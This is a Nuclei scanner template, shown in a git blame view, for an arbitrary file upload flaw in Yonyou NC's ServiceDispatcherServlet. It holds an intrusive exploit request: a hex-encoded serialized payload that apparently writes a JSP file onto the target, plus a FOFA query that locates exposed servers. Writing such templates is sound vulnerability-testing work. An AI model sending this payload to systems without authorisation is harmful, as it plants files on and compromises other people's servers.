2023-09-15 12:23:57 +00:00
|
|
|
id: yonyou-nc-dispatcher-fileupload
|
2023-08-18 03:22:06 +00:00
|
|
|
|
|
|
|
info:
|
2023-09-15 12:23:57 +00:00
|
|
|
name: Yonyou NC ServiceDispatcher Servlet - Arbitrary File Upload
|
2023-08-18 03:22:06 +00:00
|
|
|
author: SleepingBag945
|
|
|
|
severity: critical
|
2023-09-15 12:23:57 +00:00
|
|
|
description: |
|
|
|
|
Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability.
|
|
|
|
reference:
|
|
|
|
- https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md
|
|
|
|
metadata:
|
|
|
|
fofa-query: icon_hash="1085941792"
|
2023-09-18 12:45:28 +00:00
|
|
|
max-request: 2
|
2023-09-15 12:23:57 +00:00
|
|
|
verified: true
|
2023-09-17 08:51:38 +00:00
|
|
|
tags: yonyou,intrusive,fileupload
|
2023-08-18 03:22:06 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /ServiceDispatcherServlet HTTP/1.1
|
|
|
|
Content-Type: application/data
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
|
|
|
|
|
|
|
|
{{hex_decode("0000015C7271890390CEA362632F6E8819F73AC2FA807D6CAF41AE772EC2DF10A2AB43A4C7BAF2C7F57909B2C19D6CF5DE6E565331E70CB3C2E70A3AF6D1E3C4480035F870288D440C41742E3EC659DA538CC3CAA2AE86569D62D002D8CE52D7D184BE7556F95C7567C1AC40FDD7502AF38BAE48C14D6A4F473779542BD7D1072973C4CD093C6BC1D0266BE82F15EEB96D146BAF89297059448A2EDDDF63463984FFC2247032EAD18E03422B87A8CC01E651A50DD09A1DE3C87ED376B43366DE024EE3880B7006A56DF97073A7472B444FF53433DD0AE63758FEB43A808B49DA0CB5B23783C3DE07C5182D35CD467D9CA2081B47EB7F604E84A1B7DA7E665A2B5D6B04F94C838AF6AE6E4829304C2D750A0A1400860F9D7611BA8DEA77AE8C79AD44F90C55A74DD3D06D27B5F3A583E8C3FCC27FC8C9B660F0C3B52B76DB7B3A0B87D04FE98DF57D2851FD93F40D04A3DA14C658E5BCBD9DCB74E35AB50818EF")}}
|
|
|
|
|
|
|
|
- |
|
|
|
|
GET /ncupload/n2d19a.jsp HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- "status_code_1 == 200"
|
|
|
|
- "status_code_2 == 200 && contains(body_2,'just_a_test')"
|
2023-09-15 12:23:57 +00:00
|
|
|
condition: and
|